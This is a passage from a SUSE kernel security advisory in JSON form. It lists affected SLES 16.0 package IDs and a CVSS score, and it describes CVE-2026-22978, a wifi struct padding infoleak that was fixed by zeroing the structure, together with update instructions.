"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22977"
},
{
"cve": "CVE-2026-22978",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22978"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: avoid kernel-infoleak from struct iw_point\n\nstruct iw_point has a 32bit hole on 64bit arches.\n\nstruct iw_point {\n void __user *pointer; /* Pointer to the data (in user space) */\n __u16 length; /* number of fields or size in bytes */\n __u16 flags; /* Optional params */\n};\n\nMake sure to zero the structure to avoid disclosing 32bits of kernel data\nto user space.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22978",
"url": "https://www.suse.com/security/cve/CVE-2026-22978"
},
{
"category": "external",
"summary": "SUSE Bug 1257227 for CVE-2026-22978",
"url": "https://bugzilla.suse.com/1257227"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
